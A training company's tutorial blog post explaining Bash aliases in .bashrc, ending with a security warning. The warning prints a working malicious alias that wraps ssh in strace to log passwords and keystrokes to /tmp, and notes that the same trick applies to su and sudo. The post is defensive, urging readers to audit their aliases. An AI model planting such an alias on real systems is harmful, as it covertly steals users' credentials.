Linux - What's a Bash alias, and why should I be wary of them? | ATG Learning


Linux - What's a Bash alias, and why should I be wary of them?

| Friday, Feb 3, 2017

Do you know what an alias is within the context of the Bash shell?

Bash aliases are supposed to be keyboard shortcuts that automate repetitive or tricky tasks. A Windows user who keeps accidentally typing ""dir"" into a Linux shell instead of ""ls"" might get tired of the errors that result from his unwillingness to change. He could set up an alias that automatically converts ""dir"" into ""ls"" so the command executes properly no matter what he types.

How is this done? Through the .bashrc file. It's located in your /home directory.

A note-- when parsing aliases, Ubuntu is set to look for a ~/.bash_aliases file in addition to the .bashrc file. It is preferable to use .bash_aliases when possible, but later in this tutorial, you'll want to make sure you account for where your aliases are being stored-- and you'll see why!

Go ahead and open it up:

nano ~/.bashrc

Find a blank line, and type in the following (Ubuntu syntax):

alias dir='ls'

Save and exit. Now, when you type ""dir"" in the shell, it will return the results of ""ls!"" You've just successfully defined your first alias.

Every tool can be used for evil though. It is important to note though that if a malicious user were so inclined, and they had access to your Linux user account, they could add something like the following line to your ./bashrc file:

alias ssh='strace -o /tmp/sshpwd-`date'+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

What does this do? It executes a command called strace any time you run the ssh command. strace is a debugger that dumps all sorts of system information to log files. It's a useful tool and not inherently a bad thing in and of itself, but in this case, it's waiting to dump your ssh password to a file in /tmp/ called sshpwd-{date}.log!

Furthermore, the use of the strace command in this manner will also log your keystrokes. So, with one simple line of code, you may have a keylogger recording your every move via ssh.

This security tip was originally published by Diogo Monica. He further expounds that the same mechanic can be applied to steal your root password (via su) and presumably sudo, by defining aliases for either of those commands the same way.

So, in summary, as part of your regular security audit, you'll want to make sure you don't have any malicious aliases defined in your .bashrc files!

Request Information

Please fill out the form below to contact a training consultant directly or call 888-862-3784

Full Name*






Enter the text in the image